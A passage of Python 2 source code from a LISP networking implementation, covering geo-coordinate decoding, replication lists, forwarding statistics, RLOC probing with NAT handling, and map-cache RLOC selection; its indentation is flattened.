socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else "-" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
return(elapsed >= self.map_cache_ttl)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length is 0):
self.stats.increment(len(packet))
return([None, None, None,self.action, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
